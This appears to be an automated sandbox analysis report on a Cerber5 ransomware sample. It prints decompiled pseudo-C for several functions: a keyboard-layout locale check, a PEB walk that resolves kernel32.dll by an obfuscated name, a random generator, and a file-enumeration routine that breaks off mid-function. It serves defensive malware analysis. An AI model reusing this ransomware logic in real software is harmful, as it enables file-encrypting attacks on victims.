NtDeleteFile.NTDLL(?), ref: 00404E44
RtlFreeAnsiString.NTDLL(?), ref: 00404E53

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: Path$AnsiDeleteFileFreeNameName_SearchString
String ID:
API String ID: 2886153233-0
Opcode ID: 3ce07c78c49e422613c4546a06f64b52d1355eee0c1d26ab8c1d85b0072b697d
Instruction ID: 971f7049e0bf6f074288626a8879415b8312df22cfafa15f3008a757f98ac60a
Opcode Fuzzy Hash: 3ce07c78c49e422613c4546a06f64b52d1355eee0c1d26ab8c1d85b0072b697d
Instruction Fuzzy Hash: 2401ECF690020CAFEB11EFA5CD85EDFB7BCBB04304F40457AA615F2151DB399A488BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00408000 Relevance: 3.1, APIs: 2, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00408000(void* __edx, void* __eflags, intOrPtr _a4) {
				char _v5;
				signed int _v12;
				signed int _v16;
				void* __esi;
				int _t33;
				signed int _t39;
				short _t41;
				signed int _t42;
				void* _t43;
				signed int _t45;
				signed int _t48;
				HKL* _t51;
				signed int _t53;
				void* _t54;
				int _t55;
				signed int _t57;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_t54 = E004031AF(_a4, __eflags, E00405905( &E0040D668, 9, 0x9c36dbf2));
				_pop(_t44);
				_t67 = _t54;
				if(_t54 != 0) {
					_t43 = E004031AF(_t54, _t67, E00405905(0x40d674, 9, 0xb24dc829));
					_pop(_t44);
					_t68 = _t43;
					if(_t43 != 0) {
						_t60 = E00403156(_t43, _t68);
						_v12 = _t60;
						_t39 = E004053B4(_t44);
						_t53 = 0;
						_v16 = _t39;
						_t69 = _t60;
						if(_t60 != 0) {
							do {
								_t41 = E00403253(E0040317B(_t43, _t69, _t53), _t69);
								_t44 = _v16;
								 *((short*)(_v16 + _t53 * 2)) = _t41;
								_t53 = _t53 + 1;
							} while (_t53 < _v12);
						}
					}
				}
				_t42 = 0;
				_t55 = GetKeyboardLayoutList(0, 0);
				if(_t55 != 0) {
					_t51 = E004053BD(_t44);
					if(_t51 != 0) {
						_v5 = 0;
						_t33 = GetKeyboardLayoutList(_t55, _t51);
						_t57 = 0;
						if(_t33 != 0) {
							do {
								_t48 = 0;
								if(_v12 <= 0) {
									goto L11;
								} else {
									_t45 = _t51[_t57] & 0x0000ffff;
									while(1) {
										_t42 = _v16;
										if(_t45 ==  *((intOrPtr*)(_t42 + _t48 * 2))) {
											break;
										}
										_t48 = _t48 + 1;
										if(_t48 < _v12) {
											continue;
										} else {
											goto L11;
										}
										goto L14;
									}
									_v5 = 1;
								}
								goto L14;
								L11:
								_t57 = _t57 + 1;
							} while (_t57 < _t33);
						}
						L14:
						_t42 = _t42 & 0xffffff00 | _v5 == 0x00000000;
						E00405463(_t51);
					}
				}
				E00405463(_v16);
				return _t42;
			}

0x00408006
0x0040800a
0x0040802e
0x00408030
0x00408031
0x00408033
0x00408051
0x00408053
0x00408054
0x00408056
0x0040805f
0x00408064
0x00408067
0x0040806c
0x0040806e
0x00408071
0x00408073
0x00408075
0x00408080
0x00408085
0x00408088
0x0040808c
0x0040808d
0x00408075
0x00408073
0x00408056
0x00408096
0x0040809e
0x004080a2
0x004080ae
0x004080b2
0x004080b6
0x004080b9
0x004080bf
0x004080c3
0x004080c5
0x004080c5
0x004080ca
0x00000000
0x004080cc
0x004080cc
0x004080d0
0x004080d0
0x004080d7
0x00000000
0x00000000
0x004080d9
0x004080dd
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004080dd
0x004080e6
0x004080e6
0x00000000
0x004080df
0x004080df
0x004080e0
0x004080e4
0x004080ea
0x004080f0
0x004080f3
0x004080f3
0x004080b2
0x004080fb
0x00408106

APIs

GetKeyboardLayoutList.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00408098
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 004080B9

Part of subcall function 004031AF: lstrcmpi.KERNEL32(?,00000000), ref: 004031E6

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutList$lstrcmpi
String ID:
API String ID: 573063762-0
Opcode ID: a31f32d06f7e17ee4ea3a7eba88b6ffe2109cd580622e4985b4ba3a89efae58a
Instruction ID: 40abcbf1954c938740b17a7287912662274c305781500c71ab9ee89658897ea9
Opcode Fuzzy Hash: a31f32d06f7e17ee4ea3a7eba88b6ffe2109cd580622e4985b4ba3a89efae58a
Instruction Fuzzy Hash: CD315832D00625ABD7206BB58D01B8FBBA49F44710F06817FE8907B3C2DE7D8D098AD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040B8D1 Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B8D1(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x430c60;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x430ca8 = 1;
										__eflags =  *0x430ca8;
										if( *0x430ca8 != 0) {
											goto L60;
										}
										_t84 =  *0x430c60;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x430ca8 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x430c60 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x430c68 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x430c64 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x430c68 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x430c68 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x430ca8 = 1;
							__eflags =  *0x430ca8;
							if( *0x430ca8 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x430c68 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x430c68 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x430ca8 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x430c68 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x430c60 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x430c68 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x430c68 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x0040b8db
0x0040b8de
0x0040b8e4
0x0040b902
0x00000000
0x0040b902
0x0040b8ec
0x0040b8f5
0x0040b8fb
0x0040b90a
0x0040b90d
0x0040b910
0x0040b91a
0x0040b91a
0x0040b91c
0x0040b91f
0x0040b921
0x0040b921
0x0040b923
0x0040b926
0x00000000
0x00000000
0x0040b928
0x0040b92a
0x0040b990
0x0040b990
0x0040baee
0x00000000
0x0040baee
0x0040b92c
0x0040b92c
0x0040b930
0x0040b932
0x0040b932
0x0040b932
0x0040b932
0x0040b935
0x0040b936
0x0040b939
0x0040b939
0x0040b93d
0x0040b941
0x0040b94f
0x0040b94f
0x0040b957
0x0040b95d
0x0040b95f
0x0040b961
0x0040b971
0x0040b97e
0x0040b982
0x0040b987
0x0040b989
0x0040ba07
0x0040ba07
0x0040b98b
0x0040b98b
0x0040b98b
0x0040ba09
0x0040ba0b
0x0040baec
0x0040baec
0x00000000
0x0040ba11
0x0040ba11
0x0040ba18
0x00000000
0x00000000
0x0040ba1e
0x0040ba22
0x0040ba7e
0x0040ba80
0x0040ba88
0x0040ba8a
0x0040ba8c
0x00000000
0x00000000
0x0040ba8e
0x0040ba94
0x0040ba96
0x0040ba98
0x0040baad
0x0040baad
0x0040baaf
0x0040bade
0x0040bae5
0x00000000
0x0040bae5
0x0040bab3
0x0040bab4
0x0040bab6
0x0040bab8
0x0040bab8
0x0040baba
0x0040babc
0x0040babe
0x0040bad2
0x0040bad2
0x0040bad5
0x0040bad7
0x0040bad7
0x0040bad8
0x0040bad8
0x00000000
0x0040bac0
0x0040bac0
0x0040bac0
0x0040bac9
0x0040baca
0x0040bacc
0x0040bace
0x0040bace
0x00000000
0x0040bac0
0x0040babe
0x0040ba9a
0x0040baa1
0x0040baa1
0x0040baa3
0x00000000
0x00000000
0x0040baa5
0x0040baa6
0x0040baa9
0x0040baab
0x00000000
0x00000000
0x00000000
0x0040baab
0x00000000
0x0040baa1
0x0040ba24
0x0040ba27
0x0040ba2c
0x00000000
0x00000000
0x0040ba35
0x0040ba37
0x0040ba3d
0x00000000
0x00000000
0x0040ba43
0x0040ba49
0x00000000
0x00000000
0x0040ba4f
0x0040ba51
0x0040ba5a
0x0040ba5e
0x00000000
0x00000000
0x0040ba64
0x0040ba67
0x0040ba69
0x00000000
0x00000000
0x0040ba70
0x0040ba72
0x00000000
0x00000000
0x0040ba74
0x0040ba78
0x00000000
0x00000000
0x00000000
0x0040ba78
0x00000000
0x00000000
0x00000000
0x0040b963
0x0040b963
0x0040b963
0x0040b96a
0x00000000
0x00000000
0x0040b96c
0x0040b96d
0x0040b96f
0x00000000
0x00000000
0x00000000
0x0040b96f
0x0040b997
0x0040b999
0x00000000
0x00000000
0x0040b9a9
0x0040b9ab
0x0040b9ad
0x00000000
0x00000000
0x0040b9b3
0x0040b9ba
0x0040b9e6
0x0040b9e6
0x0040b9e8
0x0040b9ea
0x0040b9fe
0x0040ba00
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b9ec
0x0040b9ec
0x0040b9ec
0x0040b9f5
0x0040b9f6
0x0040b9f8
0x0040b9fa
0x0040b9fa
0x00000000
0x0040b9ec
0x0040b9bc
0x0040b9bf
0x0040b9c1
0x0040b9d3
0x0040b9d3
0x0040b9d6
0x0040b9d8
0x0040b9d8
0x0040b9d9
0x0040b9d9
0x0040b9df
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b9c3
0x0040b9c3
0x0040b9c3
0x0040b9ca
0x00000000
0x00000000
0x0040b9cc
0x0040b9cc
0x0040b9cd
0x00000000
0x00000000
0x00000000
0x0040b9cd
0x0040b9cf
0x0040b9d1
0x0040b9e4
0x00000000
0x00000000
0x00000000
0x0040b9e4
0x00000000
0x0040b9d1
0x0040b943
0x0040b946
0x0040b949
0x00000000
0x00000000
0x0040b94b
0x0040b94d
0x00000000
0x00000000
0x00000000
0x0040b94d
0x0040b912
0x0040b914
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL ref: 0040B982

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: bc0c46430afbcb94b073af8471c25a4b8e1a340d107eb079e8a445015ed2ee3d
Instruction ID: 4e5d44d476c35f123473bd712ff1369b58b65a6bdf80106f154212dd927b4b1a
Opcode Fuzzy Hash: bc0c46430afbcb94b073af8471c25a4b8e1a340d107eb079e8a445015ed2ee3d
Instruction Fuzzy Hash: B361A0717006069BDB29CF29C89466B73A5EB85314F28963BD956E73D0E738DC42CACC

Uniqueness

Uniqueness Score: -1.00%

Function 00404FE6 Relevance: .1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404FE6() {
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				char _v32;
				short _t22;
				short _t23;
				short _t24;
				short _t25;
				short _t26;
				short _t27;
				short _t28;
				short _t29;
				short _t30;
				short _t31;
				short _t32;
				short _t37;
				intOrPtr* _t39;
				intOrPtr* _t40;

				_t39 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
				_t22 = 0x6b;
				_v32 = _t22;
				_t23 = 0x65;
				_v30 = _t23;
				_t24 = 0x72;
				_v28 = _t24;
				_t25 = 0x6e;
				_v26 = _t25;
				_t26 = 0x65;
				_v24 = _t26;
				_t27 = 0x6c;
				_v22 = _t27;
				_t28 = 0x33;
				_v20 = _t28;
				_t29 = 0x32;
				_v18 = _t29;
				_t30 = 0x2e;
				_v16 = _t30;
				_t31 = 0x64;
				_v14 = _t31;
				_t32 = 0x6c;
				_t37 = 0;
				_v12 = _t32;
				_v10 = _t32;
				_t40 = _t39;
				_v8 = 0;
				while(E00404FA1( &_v32,  *((intOrPtr*)(_t40 + 0x30))) != 0) {
					_t40 =  *_t40;
					if( *((intOrPtr*)(_t40 + 0x18)) != _t37) {
						if(_t40 != _t39) {
							continue;
						} else {
						}
					}
					L6:
					return _t37;
				}
				_t37 =  *((intOrPtr*)(_t40 + 0x18));
				goto L6;
			}

0x00404ff8
0x00404ffd
0x00405000
0x00405004
0x00405007
0x0040500b
0x0040500e
0x00405012
0x00405015
0x00405019
0x0040501c
0x00405020
0x00405023
0x00405027
0x0040502a
0x0040502e
0x00405031
0x00405035
0x00405038
0x0040503c
0x0040503d
0x00405043
0x00405044
0x00405046
0x0040504a
0x00405050
0x00405052
0x00405056
0x00405065
0x0040506a
0x0040506e
0x00000000
0x00000000
0x00405070
0x0040506e
0x00405077
0x0040507b
0x0040507b
0x00405072
0x00000000

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d2d5cea87e672d897b79a4ae1888bd816b1e59c6d49eb7d22e91c5833e09a7d
Instruction ID: e0e335c2d1d0d48a37a74387565101e4d2a41a94e88aaabf3f36e5f1bcccdbc9
Opcode Fuzzy Hash: 5d2d5cea87e672d897b79a4ae1888bd816b1e59c6d49eb7d22e91c5833e09a7d
Instruction Fuzzy Hash: 9B118636A54749AAEB10CFD49851BBFB375EF40B20F20541BD640EB2E0D2B65E40C799

Uniqueness

Uniqueness Score: -1.00%

Function 004063E1 Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E004063E1(signed int __eax) {
				signed int _t8;
				signed int _t9;
				signed int _t10;
				signed int _t16;
				signed int _t23;
				unsigned int _t24;
				signed int _t29;

				_t29 = __eax;
				if(__eax != 0) {
					_t8 =  *0x42f67c; // 0xdba5d41c
					if(_t8 == 0x12345678) {
						asm("rdtsc");
					}
					_t24 =  *0x42f678; // 0xe5623597
					_t9 =  *0x42f670; // 0x118108b0
					 *0x42f67c = _t9;
					_t10 =  *0x42f674; // 0x7a7d59b0
					 *0x42f670 = _t10;
					_t16 = (_t24 >> 0x0000000b ^ _t8 << 0x0000000b ^ _t8) >> 0x00000008 ^ _t24 ^ _t8 << 0x0000000b ^ _t8;
					 *0x42f674 = _t24;
					 *0x42f678 = _t16;
					_t23 = 0x64;
					return _t16 % _t29 * 0x64 / _t23;
				} else {
					return __eax;
				}
			}

0x004063e2
0x004063e6
0x004063ea
0x004063f4
0x004063f6
0x004063f6
0x004063f8
0x00406408
0x0040640d
0x00406412
0x00406417
0x00406428
0x0040642a
0x00406432
0x0040643b
0x00406443
0x004063e9
0x004063e9
0x004063e9

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f644794e91a71f1057660ca353f50eadab9b5e89219755f30f5cb9d390549a6d
Instruction ID: 59d306ed93d779869febeb52ab6d6f8b2d8b733a6eeca01877ed689ff356df17
Opcode Fuzzy Hash: f644794e91a71f1057660ca353f50eadab9b5e89219755f30f5cb9d390549a6d
Instruction Fuzzy Hash: 90F03072B119208B976CCF39BC4461236E3D3986107D5C2BAD809D73B0D730CC578A88

Uniqueness

Uniqueness Score: -1.00%

Function 00406471 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406471(intOrPtr _a8) {

				if(_a8 != 0x16) {
					goto ( *0x40e29c);
				}
				return 1;
			}

0x00406478
0x00406482
0x00406482
0x0040647e

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fd094fcbada5ced7dcd5383e1e2aa729e5e913978ad4d840425936ca931de72
Instruction ID: 49211dd95b1368ed26aa6345cbc027157b0cbbea6f309ad6495e8672ed37e899
Opcode Fuzzy Hash: 0fd094fcbada5ced7dcd5383e1e2aa729e5e913978ad4d840425936ca931de72
Instruction Fuzzy Hash: 72B02B3249460CC9C20085823800532338C8110221F40C477D90E42401C1314030DA4C

Uniqueness

Uniqueness Score: -1.00%

Function 00401EB2 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 395
timefilesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00401EB2(signed int __ecx, intOrPtr* _a4) {
				short _v524;
				char _v532;
				void _v1554;
				short _v1556;
				char _v1564;
				void* _v1660;
				char _v1668;
				short _v1700;
				char _v1708;
				short _v1740;
				char _v1748;
				struct _SYSTEMTIME _v1756;
				struct _FILETIME _v1764;
				struct _FILETIME _v1772;
				intOrPtr _v1776;
				WCHAR* _v1784;
				longlong _v1788;
				long _v1792;
				intOrPtr* _v1796;
				WCHAR* _v1800;
				intOrPtr _v1804;
				WCHAR* _v1808;
				intOrPtr _v1816;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t111;
				WCHAR* _t112;
				longlong _t113;
				short _t116;
				int _t123;
				void* _t127;
				void* _t131;
				void* _t138;
				void* _t140;
				signed int _t167;
				WCHAR* _t177;
				WCHAR* _t180;
				WCHAR* _t183;
				WCHAR* _t186;
				WCHAR* _t189;
				WCHAR* _t192;
				WCHAR* _t195;
				WCHAR* _t198;
				WCHAR* _t201;
				WCHAR* _t204;
				WCHAR* _t207;
				WCHAR* _t210;
				WCHAR* _t213;
				WCHAR* _t216;
				WCHAR* _t219;
				intOrPtr* _t226;
				long _t229;
				WCHAR* _t232;
				signed int _t243;
				long _t244;
				void* _t246;
				void* _t252;
				signed int _t255;
				void* _t257;
				void* _t259;

				_t230 = __ecx;
				_t257 = (_t255 & 0xfffffff8) - 0x704;
				_v1792 = GetCurrentThreadId();
				_t111 = E004053BD(_t230);
				_t226 = _t111;
				_v1796 = _t226;
				if(_t226 == 0) {
					L53:
					return _t111;
				}
				_t112 = E004053BD(_t230);
				_v1784 = _t112;
				if(_t112 == 0) {
					L52:
					_t111 = E00405463(_t226);
					goto L53;
				}
				_t113 = E004053BD(_t230);
				_v1788 = _t113;
				if(_t113 == 0) {
					L51:
					E00405463(_v1784);
					goto L52;
				}
				 *((short*)(_t226 + 4)) = 0;
				_t116 =  *0x42f7a4; // 0x10
				 *_t226 = 0x52627246;
				 *((short*)(_t226 + 0x15)) = _t116;
				while(WaitForSingleObject( *0x42f834, 0xf) != 0) {
					_t242 = _a4;
					_t252 = E00401E83(_a4);
					__eflags = _t252;
					if(_t252 == 0) {
						L50:
						E00405463(_v1788);
						_t226 = _v1796;
						goto L51;
					}
					_t232 = E00409439(_t252, _t230,  &_v1772);
					_v1800 = _t232;
					__eflags = _t232;
					if(_t232 == 0) {
						E00405463(_t252);
						goto L50;
					}
					_t123 = _v1772.dwLowDateTime;
					_t235 =  &(_t232[_t123]);
					_v1772.dwHighDateTime =  &(_t232[_t123]);
					StrCpyNW( &_v524, _t232, _t123);
					_t229 =  *(_t252 + 8);
					_t127 = E00402C54( &(_t232[_t123]),  *_t242);
					_pop(0);
					__eflags = _t127;
					if(_t127 == 0) {
						_t243 = 0x2000;
					} else {
						_v1788 = _v1788 & 0x00000000;
						asm("stosd");
						_t246 = CreateFileW(_v1808, 0x80000000, 1, 0, 3, 0, 0);
						__eflags = _t246 - 0xffffffff;
						if(_t246 != 0xffffffff) {
							 *0x40f214(_t246,  &_v1788);
							CloseHandle(_t246);
						}
						_v1772.dwHighDateTime =  *(_t252 + 0x14);
						_v1772.dwLowDateTime =  *(_t252 + 0x10);
						FileTimeToLocalFileTime( &_v1772,  &_v1764);
						FileTimeToSystemTime( &_v1764,  &_v1756);
						GetDateFormatW(0x400, 1,  &_v1756, 0,  &_v1700, 0x14);
						GetTimeFormatW(0x400, 8,  &_v1756, 0,  &_v1740, 0x14);
						_v1556 = 0;
						memset( &_v1554, 0, 0x3fe);
						_t259 = _t257 + 0xc;
						__eflags = _t229 & 0x00000001;
						if((_t229 & 0x00000001) != 0) {
							_t219 = E0040591C(0x40d070, 2, 0x68262057);
							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t219);
						}
						__eflags = _t229 & 0x00000002;
						if((_t229 & 0x00000002) != 0) {
							_t216 = E0040591C(0x40d074, 2, 0xe737ec15);
							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t216);
						}
						__eflags = _t229 & 0x00000004;
						if((_t229 & 0x00000004) != 0) {
							_t213 = E0040591C(0x40d078, 2, 0x90281ace);
							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t213);
						}
						__eflags = _t229 & 0x00000010;
						if((_t229 & 0x00000010) != 0) {
							_t210 = E0040591C(0x40d07c, 2, 0x4ff7714d);
							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t210);
						}
						__eflags = _t229 & 0x00000020;
						if((_t229 & 0x00000020) != 0) {
							_t207 = E0040591C(0x40d080, 2, 0x41cc7f90);
							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t207);
						}
						__eflags = _t229 & 0x00000040;
						if((_t229 & 0x00000040) != 0) {
							_t204 = E0040591C(0x40d084, 4, 0x1b2fac60);
							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t204);
						}
						__eflags = _t229;
						if(_t229 < 0) {
							_t201 = E0040591C(0x40d08c, 2, 0xc8c3223a);
							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t201);
						}
						__eflags = _t229 & 0x00000100;
						if((_t229 & 0x00000100) != 0) {
							_t198 = E0040591C(0x40d090, 2, 0xb487359d);
							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t198);
						}
						__eflags = _t229 & 0x00000200;
						if((_t229 & 0x00000200) != 0) {
							_t195 = E0040591C(0x40d078, 2, 0x90281ace);
							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t195);
						}
						__eflags = 0x00000400 & _t229;
						if((0x00000400 & _t229) != 0) {
							_t192 = E0040591C(0x40d094, 3, 0x813b63a1);
